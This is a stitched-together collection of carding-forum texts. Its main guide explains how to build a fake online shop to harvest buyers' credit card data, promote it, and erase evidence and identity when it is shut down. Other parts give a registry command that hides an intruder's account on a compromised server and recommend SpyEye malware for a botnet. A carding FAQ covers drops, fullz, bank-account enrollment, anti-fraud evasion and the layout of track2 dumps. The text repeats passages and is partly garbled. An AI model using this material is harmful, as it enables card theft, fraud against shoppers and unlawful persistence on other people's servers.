A pseudo site is nothing more than a skillfully made resource that has an automated credit card payment system. But unlike projects that regularly send goods after payment, the pseudo-resource is completely inhumane to dynamite the buyer, placing the credit card information in a separate database. With a serious approach to business, a pseudo-site can bring a mind-blowing income to a carder. This is because online stores (or porn galleries) are very popular among the stupid, but rich bourgeoisie, for whom online shopping is the norm.
What should we build a website
To build a pseudo-site, you need to find software for it - an engine. It consists of separate html pages (payment forms) and scripts that process the information entered. The authors of the engines use two methods to store the received data:
- Through a database (DB). This method eliminates many problems that a user of the engine may face; for successful work, it is enough to create a base and a couple of tables. Then the scripts themselves will access the database and request / save data.
- Through files. All free engines are distributed with this algorithm. Here you will have to sweat, changing the default values of the paths in the script configs. We must not forget about the access rights to the files in which the information will be written (set manually).
A good dcshop engine is lying on frivolous sources. He organizes a one-stop online store selling all kinds of junk. Knows how to authorize after payment by credit card and is completed with a script for administering goods.
Conveniently, dcshop works under both UNIX and NT platforms. In addition to this, it is supplied with a detailed manual and a bunch of default configs.
In order for the store to function, the hosting is required:
- access to the FTP server;
- WWW server with support for cgi scripts;
- support for your own .htaccess files is desirable;
- SSH access is desirable, which will allow you to install and change dcshop settings directly from the shell without any problems.
The first two points, which are necessary, are satisfied by almost all free hosting services, so register on a bourgeois resource (it’s easier to excuse yourself later) and start installing an online store. If you wish, see the work of the project online at
http://kamensk.net.ru/forb/cgi-bin/shop/dcshop.cgi...
Although dcshop does not use a database for storage (writes to separate files), it is just fine, since not every free hosting provides access to the database (but there are pleasant exceptions, for example,
www.spaceports.com).
Delivery and installation
The engine consists of three scripts: a store with cart support, an admin area and a script for requesting information about a credit card. Each script has its own configuration file.
First, set up config .setup, in it you need to change several values of variables and paths to directories. The main variable in the config is $ cgidir, it points to the cgi-bin directory where most of the engine scripts will be located. It is best to create a subfolder in the scripts directory and define store scripts in it. For example, the value for $ cgidir might be "/ home / carder / web / cgi-bin / eshop".
Next are the paths that depend on $ cgidir. It is better not to change them so that there is no confusion when uploading files to the server. The next variable $ order_database leads to the most interesting file, for which we are installing the dcshop project. This is a database of credit cards, more precisely, all information about bourgeois credits will be dumped into this document. The default value of the variable is "orders.txt", and this file is located in the path specified in the $ order_dir variable. I recommend changing the paths to more complex ones, otherwise the database will be accessible via the web.
The $ templatefile variable is responsible for the main html file that will be loaded after the dcshop.cgi script is executed. You can put your copyright in this file, or convince the bourgeois of the legality of your commercial activity.
Then specify the path to the sendmail binary. Usually it is located in the / usr / sbin directory, otherwise the location will be specified by the hosting administration. The variable is set so that after a successful order, the client will receive a payment acceptance letter. At the same time, change the address of the smtp server, the soap from which the letter will be sent, as well as its subject (for example, smtp.spaceports.com).
The next section of the config sets the absolute paths to the site. Let's say you were given the domain shop.hosting.net. Based on this, change the $ cgiurl and $ mainurl variables to the values for the html and cgi-bin directories, respectively, for example,
http://shop.hosting.net/cgi-bin/eshop. In the same place, specify the path to the pictures (they will be located in the directory for html files).
The project assumes the presence of an https server, but I strongly doubt that free hosting offers https. If yours is not an exception to the rule, then make the values of $ secureurl and $ secureimgurl equal to $ cgiurl and $ mainurl. At the end of the section, indicate the e-mail of the project administrator.
On this, in fact, the default setting ends. Additionally, you can (strongly advise) redefine the paths to the default scripts. Then, if bugs are found in the dcshop project, your resource will not be hacked (without knowing new paths). So change the values of $ dcscript, $ checkout_script and $ adminscript. Open the dcshop.cgi script and change the path to the config in the require line. And rename the config. If there are any problems, there are both in the project's FAQ and in the readme file about it.
Hone the rest of the scripts
In addition to the main config, there are setup files for the checkout and admin scripts. In the checkout config, change the default html templates to something more beautiful (I personally didn't like the word "demo" in the text). And in dcshop_admin.setup you will have to change the path to the directory where the administrator password is stored. I recommend that you close access to the directory with the specified file (which is why you need support for your own .htaccess files), because a knowledgeable person will be able to see the contents of the directory, and therefore the file with the password.
Correct transportation
Now is the time to transfer files to the FTP server. First, create a directory for html files, as well as a subdirectory Images (note the case). Then transfer all default images to this folder. Go to cgi-bin / eshop, fill in all configs and scripts in this directory. A nuance - you need to fill in in ASCII mode, otherwise the scripts will not work. There is only one little thing left - set the rights to 777 for all directories, and 755 for the .pl and .cgi files.
It's time to test the result. Refer to the main store script dcshop.cgi. If everything is correct, then the store will function without any side flaws. If you get a 500 error, find out the reason why the script doesn't work. To do this, create a .htaccess file in the WWW root with the following content:
Code:
<Directory "/ path / to / www">
ErrorLog "/path/to/www/error.log"
</Directory>
After that, once again refer to the script and read the contents of the log in the html directory. Perhaps you just forgot to upload some file or change the default path.
Now get into the admin script. So that no one will fuck you or steal a large database of new credit cards, go to the admin area and register as a new user with administrator rights. After that, stomp on the "Change Configuration Setting" link and prohibit the registration of new users. Steering wheels on your health with your online store.
It makes sense to create a separate directory for the admin zone and close it with additional authorization (out of harm's way). This is easily done using standard Apache tools. First, you need to create a .htaccess file in the directory with the admin script. In it, write the following:
Code:
AuthType Basic
AuthName "Admin zone"
AuthUserFile "/path/to/.htpasswd"
Require valid-user
Then create a .htpasswd that records the account as a login: password pair. Valid password encryption algorithms: DES, MD5, SHA, and Plain text. The htpasswd utility included in the Apache distribution can encode passwords. The MD5 algorithm is supported by all versions of the web server and is the most reliable. The password is set with the command htpasswd -bcm .htpasswd admin myp4ssw0rd, the -bcm option means writing the MD5 password to the new .htpasswd.
Set the permissions to .htaccess and .htpasswd to 600. This will only allow you to change them, other vagrants will not have access to these important files.
We build a business
Now you need to change the default products. If you're all right with your imagination, you can easily come up with products that rich and stupid foreigners will want to buy. But first you need to understand the structure of the product base.
In the file with the product (no matter which one), you can set several parameters. These are ID, Category, Product Name, Image, Description, Price and Taxable. Additionally, it has its own optional parameters, for example, color and style. Read about them in the readme.txt file. You fill in the data, and they are automatically placed in the Data folder relative to the cgi-bin / directory.
The installation script with brief information about this category of goods is stored in the same directory. Conveniently, the engine includes four ready-made samples. Thus, just create a similar template for a product category and go.
The base is still better
Writing your own engine with database support is not so difficult. You need to know the principles of exchange between the client (project script) and the server (mySQL database), to which you will have access. In this case, it is not necessary to write a separate engine, it is enough to make some changes to the dcshop code and teach it to handle the database.
With the help of a special module DBI.pm, you can work with mySQL (this is the database that rules on most hosting sites). You will need three things: the ability to connect to the database, insert and modify data in it, and also read information from the necessary tables into the database. To remake the file engine, you just need to replace the access to the file with a request to the database. Fragments of code that implement competent work with mySQL (the code is provided with detailed comments), download at
http://kamensk.net.ru/forb/1/x/mysql-code.
Law is law
Someday your resource will be closed. This will most likely happen after the hosting support service receives a complaint from another inflated client. Therefore, you will not be disturbed by a few useful tips so that the consequences of the closure of the project do not affect your health:
1. When organizing a mini-porn gallery, no one will demand any responsibility from you if you create a start page with a warning about the client's majority.
2. If things are going well, register yourself a second-level domain and start a normal hoster. When your resource is deleted, you can easily change the dns zones of your domain when you move to another hosting.
3. Try to leave as little information about yourself as possible on the resource pages. Better tell me that you are some rich Chinese selling Parker pens than a poor Russian student.
4. When you move, you will have to face such a problem as backing up all the data. This must be done in time, when you feel that the case smells like kerosene. If there are no problems with the files, skillfully backing up the database is a delicate (albeit simple) matter. This requires the help of a small utility called mysqldump, which is included with mysqlclient. You go to your hosting shell and type the command:
Code:
$ mysqldump -u client -pclientpassword eshop> eshop.sql
Accordingly, the account to the database should look like client: clientpassword, and the base should be called eshop. The binary will form the table structure, which should be archived and transported to another hosting. It is better to compress with the bzip archiver:
Code:
$ tar jcf eshop.tar.bz2 eshop.sql
On the new hosting, you need to unpack it and create a copy of the database structure (using the eshop.sql file). At the same time, you do not need to worry about creating tables and databases, mysqldump will do everything:
Code:
$ tar jxf eshop.tar.bz2
$ mysql -u client -pclientpassword <eshop.sql
By overriding the input, you let the mysql binary get commands directly from the file. In our case, from the eshop.sql backup.
5. To get away with it, delete all files from the old hosting (of course, after the backup) and drop the database. This can be done with the command "drop database eshop;" in the mysql client.
Now you are a carder
That's all. Pseudo-business is a very profitable business, because all the credit cards earned go only to you. Dozens or even hundreds of rich bourgeois can visit such a resource per day (depending on promotion). But in the organization of such projects there is a certain amount of risk, otherwise everyone would make online stores and live off the bourgeoisie. Therefore, if you earn decent money, and decided to create a pseudo-site only out of curiosity, think at your leisure whether you should spend your nerves and money on illegal activities.
Resource promotion
Making a pseudo-site is half the battle, you also need to promote it. Otherwise, your resource will become dusty and will not be of any use. To attract visitors, of course, all means are good, but not all are effective. In an amicable way, if you plan to get decent money on the resource, you will first have to spend money on promotion.
First of all, keep in mind that your main audience is foreigners. Hence, advertising is targeted at them. Most likely, the resource itself will have to be made in English, or in Russian and English at the same time. Next, you register the resource on search engines, while you are interested in both our search engines and foreign ones. Never bother with finding a complete list of search engines, it is enough to know one large one (for example,
www.yandex.ru or
www.rambler.ru), and find the rest directly through it.
The trick is often effectively redirecting traffic from other porn sites. That is, a porn server is created, untwisted alone, and then any others are promoted with the help of this server. How exactly to do this is a matter of technique: redirect part of the visits, load in parallel, or use hook links. At the same time, counters of rating systems are placed on the untwisted resource, and it soars to the skies. And there it is already like an avalanche. Further, the promoted resource, in turn, can be used to promote the next one.
Some craftsmen deliberately set up resources in order to offer promotion to others for money. You can find similar resources on the terms of mutual promotion. That is, at first they promote you, and in the future you will exchange traffic, mutually increasing the number of real visits to your sites.
Another effective way to attract potential buyers to your pseudo-resource is banner advertising. At the same time, it is not necessary to expose the code of the banner system, you can buy out impressions on the secondary market, which is sometimes very profitable. The secondary market for banner impressions is, in fact, traffic-generating resources registered in banner networks. They spend part of the impressions on their own promotion, and part of them they sell on the so-called secondary market of banner impressions. There is another option to sell impressions directly to the banner network, but the prices will be lower, plus not all banner networks redeem their impressions, or redeem them only on certain (most often unfavorable) conditions.
To buy banner impressions on the secondary market, you will need a banner exchange, where you can determine the prices (average for the exchange) for certain banner networks and banner formats, plus buy out the necessary impressions, if available. One of the popular banner exchanges is
www.banstock.com. There you will find an FAQ, and statistics on the most popular (read - in demand) banner networks and formats, and someday you will be able to sell banner impressions to other beginning resources through it yourself.
Free engine
With a serious approach to business, a pseudo-site can bring a mind-blowing income to a carder.
To build a pseudo-site, you need to find software for it - an engine. It consists of separate html pages (payment forms) and scripts that process the information entered.
A good dcshop engine is lying on frivolous sources. He organizes a one-stop online store selling all kinds of junk.
I recommend that you close access to the directory with the specified file (which is why you need support for your own .htaccess files), because a knowledgeable person will be able to see the contents of the directory, and therefore the file with the password.
A nuance - you need to fill in in ASCII mode, otherwise the scripts will not work. There is only one little thing left - set the rights to 777 for all directories, and 755 for the .pl and .cgi files.
Then create a .htpasswd that records the account as a login: password pair. Valid password encryption algorithms: DES, MD5, SHA, and Plain text. The htpasswd utility included in the Apache distribution can encode passwords.
When you move, you will have to face such a problem as backing up all your data. This must be done in time, when you feel that the case smells like kerosene.
If you earn decent money and decided to create a pseudo-site just out of curiosity, think at your leisure whether you should spend your nerves and money on illegal activities.
1.Automatically find many proxies
(for this there is such a program called Proxy Switcher! You can download it here rutracker.org/forum/viewtopic.php?t=3516193 performs completely all the functions declared by space)
2.Scan the Internet for hidden proxies
The same function is performed by the same Proxy Switcher program!
3. Find valuable materials on Dedicated servers, and be able to protect your
For this there is a program that finds words in the text! (for example, look for CC? Enter the word connected with CC on the Dedicated Server, for example CVV, and if there is a program on the Dedicated Server, it will find it!) You can download it here i-vd.org.ru/soft/find-txt.shtml. Description of the program Folder Find Text and another software called Everything - The program for finding files here video
4. Be able to be hidden from the administrator on the Dedicated Server
Firstly, you need to clean the Dedicated Server for each entrance and exit... secondly, you need to have an Admin Panel on the Dedicated Server... so that you are not thrown out of there)) Thirdly, you need to hide your profile on the Dedicated Server) How to do it?
For WIN Dedicated, you go to the command line (cmd.exe) and write:
Remove the account from the user selection menu:
PHP code:
Code:
reg add "HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList" / v user / t REG_DWORD / d "00000000" / f
It is also wise to hide the folder with files on the account:
attrib + h + s "C: \ Documents and Settings \ user"
where "user" is the name of your account (for example, user).
5. Several types of receiving Dedicated
- Private dictionary, which is collected from 30 million SQL records
- Access technology using a minimum of computer resources
6.Get routers with minimal traffic losses
Here I am powerless because I am a carder and I haven’t dealt with this kind of traffic and I don’t need it either but still read this article rutracker.org/forum/viewtopic.php?t=2953621
7.Get vulnerable sites and turn them into encrypted proxies
The same proxy switcher answers this question rutracker.org/forum/viewtopic.php?t=3516193 you insert the link, it will scan the proxy and bevels but in general, the guys on the note of the proxy are far from the topic and they cost only $ 1 the maximum price for a good proxy. IMHO they DIE quickly!
8.Create a botnet quickly
Creating a fast botnet is easy... because the versions in the public are just full of different ddoser and also virey, I would advise spyeye to download it here FILLED IT YOURSELF! IMMEDIATELY I WILL TELL THAT ANTI-VIRUS WILL BE EXPRESSED)! but the most important thing is that a botnet needs Traffic, spoofs or injections that cost at least $ 500 and more ... as well as downloads that cost about the same) but again, a botnet can be used for different purposes)
9.Protect your Dedicated Server and your computer from hacking
We have already spoken about Dedicated computers)) and now about the computer) there is such a funny program tech.pp.ru/trans/truecryptrus/ TureCrypt) also in the encryption manual there are articles about this program!
10.Create your own proxy service, or profitably sell your base to proxy and Dedicated sellers
I already said, proxies die quickly and live for them from 20 minutes to 12 hours) and Dedicated is a specific topic ... as I wrote above) There is not only software on how to get Dedicated Devices, but also your own online Dedicated Dedicated Shop! In this way you can get Dedicated Dedicated to promote your shop and sell Dedicated Dedicated Products ONLINE!
Payment systems operation mechanism
The credit card is primarily the outside of your bank account. The work of the credit system is ensured by: the payment system, banks, manufacturers; a simple credit card purchase is a rather complex mechanism. I will tell you about this and many other things today.
Payment mechanism
Almost any financial transaction using a credit card begins with authorization. During this stage, it is necessary to determine whether you have the necessary funds on your account and whether you can use them. Authorization can be carried out in any available way. The authorization decision can be made by the card itself (in the case of a card with a microcircuit) - this method is called off-line, i.e. you do not need to contact anyone. Otherwise, it is necessary to request confirmation from the bank: the request is sent first of all to the acquirer (to the processing center), then forwarded to the issuer, who makes a decision, the response is redirected again to the acquirer and only then is returned to the place of the request (this method is called on-line). This process can take place over the network, or the salesperson can simply ask - by voice or fax.
If the authorization is confirmed, then further you can fully dispose of the reserved amount. If the answer to the request did not come, then - I'm sorry. And this is not the worst option - in response, the seller may receive an order to withdraw the card from you (for example, if they are listed as lost or stolen). Therefore, authorization is a key step in the transaction. In rare cases, authorization may not be available, more on this below.
The amount for which authorization was requested is frozen on your account, even if you suddenly change your mind about making a purchase. Upon completion of authorization and after a short period of time, the bank proceeds to transfer funds to the merchant's account. That is, you have already left the store, taking your purchases, and the seller is still waiting for his money. To begin with, the issuer sends a request to transfer the reserved funds to the settlement bank, which will deliver them to the acquirer's account, which, in turn, will redirect them to where you made the purchase. For the transfer of funds, the acquirer will keep a small percentage of the amount, for the urgency the percentage will be higher. In total, the seller will have to wait for money from several hours to several days. For this, many shops do not like to serve loans.
The entire set of financial transactions on loans from start to finish is called interchange (or interchange).
What the bank can give us
From a banking point of view, loans can be divided into three main classes. This is important because it determines how you can manage your money or borrow.
1. Debit (payment) cards - you can use only those funds that you put into your account ahead of schedule. Such a loan is the easiest to obtain, and it costs less than the others (sometimes they are even given out for free). No credit or overspending on the payment card is provided. By the way, debit cards are the most common.
2. Credit cards - are used to obtain a certain (pre-agreed) loan at a certain percentage for a certain period. Unfortunately, the percentage is quite high - from 10 to 40% per annum for Russia. You do not need to deposit money to the card account. Accordingly, the more credit is given on the card, the more difficult it is to get it and the more elite it is (the loan amount can reach several tens of thousands of dollars). To conclude a contract, in addition to basic documents, you must submit a certificate of your monthly income.
3. Overdraft cards (almost the same as a credit debit card) - payment cards with a credit limit. You can put money into your account and make a certain overspend. The loan is usually given for a period of one to three months, but the longer you have a debt, the more you will have to pay interest. IMHO, these cards are the most convenient.
By habit, both debit and overdraft and credit cards are simply called credit (credit cards / credits), which, as you can see, is not entirely true.
By the way, you can buy your very first credit card from the age of 14.
Basically, the seller / ATM doesn't care what card you pay with (your funds or a loan), they don't even know how much money you have in your account. But in some places, debit credits are not accepted, unlike credit or credit-debit (which is one of their advantages).
By the way, the bank is often thrown on credit or overdraft cards. Sometimes it is almost impossible for a bank to legally return the entire loan to itself, even through the court, if the client refuses to return the money (here, by a court decision, they can only deduct a certain percentage from the official (!) Salary of the debtor). Therefore, in Russia for a long time, ordinary customers were provided exclusively with debit cards (even if the card was a credit card by definition). Only in the last few years has it become real to buy a full-fledged credit card.
Another very important role is played by such an indicator as the limit of the amount for which you can make a purchase without authorization (the availability of funds on the credit is not checked, and a payment order for this amount is simply sent to the issuing bank). Unfortunately, this amount is relatively small (about $ 50). Here is another way to shoe the bank, you can even use an empty or left credit. Although, by and large, your 50 bucks can be like a drop in the ocean (you won't upset them too much). In Russia, such a system is not widespread, which is a pity.
Payment systems
There are countless payment systems in the world - each country has its own and more often than not one, there are also international systems. By the way, payment systems include not only banking, but also travel and entertainment systems - the so-called T & E (Travel & Entertainment), for example, American Express and Dinners Club. Of the international systems, only a few of the largest stand out: Visa, Eurocard / MasterCard, American Express (AmEx) & Dinners Club International (DCI). The largest systems in Russia can also be noted: Union Card, STB and Zolotaya Korona (however, the advantages of these systems are very doubtful due to their low prevalence). By the way, in Russia, unlike other countries, in order to become an issuer, you need a special license from the Central Bank.
By far the most popular system in the world is Visa. This system is used in about 20,000 banks in 72 countries of the world, it makes no sense to talk about the number of users - their number is steadily growing every day.
The second largest system is Europay International. It combines two large subsystems at once: Eurocard / MasterCard and Cirrus / Maestro.
Now a little about the components of the payment system. Several participants (more precisely, types of participants) are responsible for the functioning of the system. These are issuers, acquirers and settlement banks. Each of the participants must clearly fulfill their functions. Acquirer is a bank that serves all the necessary financial transactions for loans. The issuer is the organization itself that issued the credit. Settlement banks play the role of regulators between all parties to the transaction (monitor the transfer of funds, etc.). It should be noted that different banks are not necessarily responsible for this - all these functions can be performed by a single bank.
Card classes
Each payment system issues several types of credit so that anyone can choose the credit card that is right for him. The class of the card determines almost all of its characteristics (the rest is determined by the bank). Usually, credits are issued for electronic (for ATMs and terminals), economy, standard and elite class. The more expensive the card, the more advantages it has: a large credit limit, it is accepted in more places, you get a lot of all kinds of discounts, gifts and other things, plus, of course, great service.
Visa offers a choice of Electron, Classic, Gold, Platinum credit cards and several others, more rare. I have arranged the credits in the order of their value. For the annual service Visa Electron charges about 5 bucks, for Classic - 25, and for Gold - all 100. Visa Electron is intended only for use in ATMs and electronic terminals in stores. Classic and Gold are higher class credit cards, but in order to use them, it is necessary that your account balance does not fall below a certain amount: usually $ 100 for Classic and $ 1000 for Gold (although sometimes such a limit is omitted by banks). The difference between Classic and Gold is quite insignificant, they differ mainly in a large number of additional chips in the latter. These were debit cards. Visa Platinum is already an overdraft card. This card is worth it according to its name, and it's hard to get it.
The Eurocard / MasterCard system uses similar credits: Cirrus / Maestro, Mass, Gold. All characteristics are roughly the same as those of Visa.
Electronic maps
It's no secret that credit cards can also be used to pay on the internet. All would be good, but there is a big security problem. To pay for a purchase directly in an online store, you have to provide your identification data, after which their confidentiality is at risk. In order to secure all financial transactions through the Network, special payment subsystems have been created. There are a lot of such systems on the internet, perhaps the most famous in Russia - WebMoney, but it is not oriented towards working with credit cards, so I will not consider WebMoney. Other popular systems: CyberPlat, ASSIST, PayCash, RBS and ElIT. The principle of operation of these systems is approximately the same - they are intermediaries between you, the bank and the online store. Of course, for their services, they keep a certain percentage of the transaction amount, but they guarantee the safety of your funds and confidentiality of data. Almost all of these systems provide work with cards of international payment systems Visa, Eurocard / Mastercard, American Express and Dinners Club, and sometimes they also service credits of Russian payment systems.
The security of the transaction can be ensured in the following ways: the online store does not receive your identification information (they are stored only by the payment subsystem); data transmission channel is protected by SSL; a digital signature is used; the legal purity of both parties is guaranteed; special SET certificates are used; full account statement of all financial transactions carried out. Such a scheme is convenient for both sellers and buyers who do not mind giving some money for security. Such systems also have their drawbacks: for example, you can only work with a store registered in this network. Also, sometimes it is necessary to install a proprietary program for work.
Total
That, in fact, is all I wanted to tell you about the role and function of credit cards in the financial system. They write dissertations on the topic of credit cards, create entire portals on the Web, write huge documentation. You understand, all this material was simply impossible to cover, but I tried to describe all the most significant and remarkable.
Vocabulary
- Obverse - the front side of the credit card
- Imprinter - a seller's device that imprints the embossed data on a receipt
- Card reader - a device for reading data from a card
- Settlement bank - a bank that regulates financial transactions between parties to a transaction
- Reverse is the reverse side of the credit
- Tipping - the process of imprinting embossed data on a receipt
- Acquirer - a bank included in the payment system and servicing all financial transactions on loans
- Embossing is the process of extruding (embossing) text on the surface of a credit card, thus squeezing out the credit number / expiration date / card-holders-name, etc. (hence the name of the cards - embossed)
- Issuer - the organization that issued the card
The amount for which authorization was requested is frozen on your account, even if you suddenly change your mind about making a purchase. Upon completion of authorization and after a short period of time, the bank proceeds to transfer funds to the seller's account.
To conclude a contract, you must, in addition to the basic documents, provide a certificate of your monthly income.
The security of the transaction can be ensured in the following ways: the online store does not receive your identification information (they are stored only by the payment subsystem); the data transmission channel is protected by SSL.
Q: What are Credits, CC, Cardboard and where can I get them?
A: These are credit cards, it is thanks to them that we exist.
There are many ways to get CC - from banal theft to hacking an online store, but at this stage I would advise you not to turn around and just buy them from famous people on this forum.
Q: I'm new to carding. What topic is better to start working on?
A: If there is zero in carding at all, then my advice to you is to start with hammering in order to get at least a little idea of carding. Read all the articles in this section - it will help you get at least some idea of our business.
Set up a driving machine, ensure your safety and look for an employer.
Q: Who is vbivalshik (stuffer)?
A: This is a person who is engaged in driving credit card information into some store, the successful outcome of the entire operation depends on him. You can find out more about what it is here.
Q: How much does the driver get for his work?
A: Well, it all depends on how you agree with your employer, whose consumables will be (cards, proxies, etc.) and what the complexity of the work is. On average, they pay from $ 2 to $ 5 for driving.
Q: What is an issuance?
A: This is the bank that issued the credit card itself, you can find out the name of the bank that issued the card using the CC2Bank program
Q: What is a bin?
A: Bean is the first 4 or 6 characters in the credit card number, it is from it that they find out which bank is issuing the credit card, as well as the type of card.
Q: What is CVV / CVV2 code?
A: These are 3-4 additional numbers designed to improve the protection of credit cards, at the moment it is very difficult to find places that would accept cards without CVV.
Q: What does credit card information look like?
A: You can find out more about this here
Q: What are Full Info cards and why are they needed?
A: This information on a credit card includes, in addition to standard data, SSN, DOB, PIN, MMN, etc. Such information is needed in cases where more complete data on the cardholder is required (for example, when enrolling) or cash out.
DOB - Date of birth
SSN - Social Security Number
MMN - Mothers Maiden Name
Some fullers include PIN => they are also dumps.
To cash out such a card, you need a trail. data cc #, exp, PIN, a certain bin by which it will be poured (i.e. if the card does not have track2 so that the generator can punch it in certain bins) and, of course, an experienced pourer.
Q: Who is a drop?
A: This is a person who accepts in his own name any goods you have scarred, after which he sends it to you or another drop (in general, there are different options here). Most often, drops do not know that they accept stolen items and sooner or later the cops will come for them.
Q: I have withdrawn from the card about $ 50- $ 100 will they look for me for this money?
A: According to the idea, of course, they will have to look for you, but in practice it makes no sense, because your searches will result in larger sums.
Q: What is PayPal or stick?
A: The online payment system for various services in the USA is very popular, there is the possibility of replenishing your account using a credit card.
Q: Could you tell me the shops that 100% send the goods?
A: No, this information is of a certain value and just like that, no one will tell you a shop that sends 100% of the goods.
Q: What is a tracking number or track?
A: After you ordered the goods in the shop, they are sent to the drop using mail or courier service. The most famous of these services are UPS, FedEx, AirBorne, etc. So after the goods are sent you are given this very track, with the help of which you can find out where the parcel is at the moment on the courier service website.
Q: How can I transfer money from a credit card to WM?
A: There is no way to directly transfer money from a credit card to WebMoney.
Q: What is fraud?
A: Translated from English "fraud", in principle, the translation fully reflects the meaning of this term.
Q: What is anti-fraud and how to get around it?
A: This is a fraud protection system - various additional checks.
How to get around - be completely like an Amer, in all guises, and everything will be ok.
Sometimes it's easier to score on a shop with a strong anti-fraud system than to try to bypass it.
Credit line - the amount of credit that the bank gives (trusts) for spending and purchases now and which the client can repay later.
Current Balance - how much you spent, then you will have to return so much to the bank.
And from the Credit line is deducted
Available Credit - how much more you can spend.
A card or, more precisely, a loan is issued for a year or several years. Therefore, it is written on the card.
Expiration date - month and year when the agreement with the bank will end. For example 06/2022.
Each card is unique. To maintain this uniqueness, they write on them
Card Number is a number, usually 16 digits. Less common are 13-digit ones. American Express has 15 digits by default.
Keeping an eye on and looking after all this credit card payload.
Visa and Mastercard / Eurocard are international payment systems (MPS). Visa's card numbers start with 4, for Mastercard, they start at 5. Other brands are not so developed and can hardly go beyond their own country (American Express, Discover, JCB, Zolotaya Korona, etc.)
It happens that the cards are dropped, but they do not bend over them, tk. from a distance it looks like a bar of soap, and move on. And since when shopping for large amounts, they often ask for an identity document, so that attentive cleaners cannot buy goods at someone else's expense, they write on the front side of the card
Cardholder's Name - name and surname of the cardholder. (The card is the property of the bank. The client is only given it to carry with him, that is, to be this very holder.)
And so that the owners of photographic memory, having seen all the details of the card in the hands of the owner, could then buy anything by phone or online using someone else's card, it is written on its reverse side
CVC2 or CVV2 - three secret numbers in small print. Mastercard calls it Card Validation Code, Visa calls it Card Verification Value.
In order for the cardholder to know how much he spent or deposited into the account, the bank sends him
Statement - a monthly detailed report on all movements of money on the card, where the cost of the Colt, lawyer's services, entertainment tax, etc. are indicated line by line.
There are such fields that are important for the bank and unloved by cardholders such as
Minimum Payment Due - the amount of the monthly payment, the figure calculated and recalculated every month, at least which the client must return to the bank for the money spent. The total amount of debt is divided by the remaining months until the end of the contract, interest is wound up and the client pays all this little by little every month, instead of dumping a bag of kilo-bucks on the table at the end of the term. Yes, and safer, will not run away with the money and will not die at the wrong time.
Payment Due Date - no later than this date every month the cardholder pays his Minimum Payment Due otherwise the bank will wind up more
LATE FEE - daily penalty for late payment.
From the limits in the statement you can still see
Cash Advance Limit - this is the maximum amount you can get on the card with money at an ATM in total (not at one time). A one-time, or rather a daily limit for CA is most often $ 500. But in different banks it can be more or less.
The terms in different banks may differ from the above, but I hope the essence is clear so as not to confuse the balance to be paid with the spend limit. The main confusion arises from a fundamentally different type of cards - debit cards. There, yes, how much you put into the account, you can spend so much, i.e. balance in the direct sense.
Carding Slang
Billing address, billing - residence address where Statement is sent.
Billing phone - the phone of the holder, which the bank or shop calls in in case of any discrepancies.
Shipping address, shipping - the address where the store should send the ordered goods. For large purchases, it is required that it coincides with the billing address or be entered in the card properties in the bank exactly as shipping, otherwise they will
Troubles - trouble, that is. Troubles with a shop are solved.
By ringing - i.e. a call to the store with confirmation of purchase, billing and shipping addresses and all kinds of loyalty. If troubles are in English or German, you can order the services of a dialer who will do all this professionally (if possible). The dialer needs to tell all the information that the shop will require when talking. It is different in different shops, but in all they will ask
Order (order) - the number of the order made on the site. What the dialer and the shop have agreed on, you can find out not only from the dialer's words, but also on the store's website after a while. The order can have different statuses depending on the store and the software used in it. It may not even come to ringing if you use
Enroll - access to card data through the bank's website. Again, each bank has its own system. Somewhere you may only need
MMN (mother's maiden name) - mother's maiden name. Somewhere along with
DOB (date of birth) - date of birth. Somewhere only
SSN (social secure number) - individual taxpayer number. Somewhere a combination of the above with a PIN number or even with
DL (driver's license) - driver's license number. This is usually classified information. But there is breaking through - finding SSN, DOB, MMN, DL in various databases. A puncher for money will find data on almost any American. If time does not allow you to be puzzled by the breakout or the punchers have all disappeared offline, you can buy
Fullz (full info) - all cardholder data sufficient to register enroll on the bank's website.
By enrolling the card there, you can change the billing phone to your own, and the billing address to your own or someone else's
Drop - a person who agrees to accept and forward the purchased goods wherever they say. He does it for money or pretty promises, how it goes. In general, this topic is dealt with
Drop service - a specialist in brainwashing the drops to agree to work with the stolen goods. But there are not only
Adjustable drops - "lit like a sucker", but also non-adjustable drops. These are partners who know what they are doing and actively contribute. Somehow they are looking for rented apartments, they send scans of documents if necessary, a shop can ring, etc. They demand a large share for themselves, they often throw them, but it is easier to work with them, of course.
So about the order. His best and last status:
shipped - sent to the shipping address. If the drop guide is reliable and its drops are stable, you can start dancing, it is stolen successfully. You just need to inform the drop conductor
track (tracking number) - a unique number of the parcel in the postal courier service, for example, DHL, UPS or FedEx. It appears on the shop's website in order details after being sent. Using this number, you can track the status of the parcel on the website of the service selected for sending, where it is located and what happens to it. As soon as the status becomes
delivered - delivered, responsibility for the goods is transferred to the drop distributor and in the coming days he will pay for the goods (in theory). By the way, keep track of which city is delivered. And it happens that the parcel is returned back to the shop and delivered is slightly not where expected.
Of the negative terms canceled, declined, suspended, FBI, USSS, the drop guide threw. I wish everyone never to deal with them, or at least with minimal losses.
Don't confuse DUMPS with SS!
So, now we will describe what should be written on the track. We are interested in the second track, and what can we see on it ?:
It can contain up to 40 characters:
First comes the start symbol -%
Then comes the PAN - up to 19 digits, in our case it is the card number.
It includes the card emitter code (IIN: Issuer Identification Number) (up to 6 characters), which in turn consists of:
Major Industry Identifier (MII: Major Industry Identifier) (up to 2 characters):
0: Reserved for future use by ISO / TC 68.
00: Not for card issuance
1: Airlines.
2: Airlines and for future use.
3: Travel and entertainment.
4: Banking / finance.
5: Bank / Finance.
59: Non-ISO financial institutions.
6: Banks and Merchs.
7: Fuel industry.
8: Telecommunications and for future use.
89: Telecommunications and Private Agencies.
9: Reserved for national use.
Next comes the emitter code (II: Issuer Identifier), up to 5 digits, in some cases the INN length or its size is written if it is outside the ISO limits. If MII is 9, then the first three digits are the country code (not of interest to us)
Then comes the individual account number (IAI: Individual Account Identification), up to 12 digits, assigned by the organization that issued the card
Then comes one digit, used to check the number and other information, is calculated using the formula: (I'll lay out the formula a little later) The mastercard PAN consists of no more than 16 characters, and for VISA - 13 or 16, including the check digit.
Next comes the separator, one character - =
It is followed in some cases by the country code (if the PAN starts with 59), it is defined in ISO 3166: 724 for Spain, 840 for USA, etc.
Then, in most cases, there is the expiration date of the card in the format YYMM (year month).
Then comes the three-character service code, which consists of:
The first digit defines where the card can be used:
0: Reserved for future use.
1: For international use.
2: For international use, with restrictions.
3: Reserved for future use.
4: Reserved for future use.
5: For internal use only, except for pre-negotiated agreements.
6: For internal use only, except for pre-agreed agreements, with restrictions.
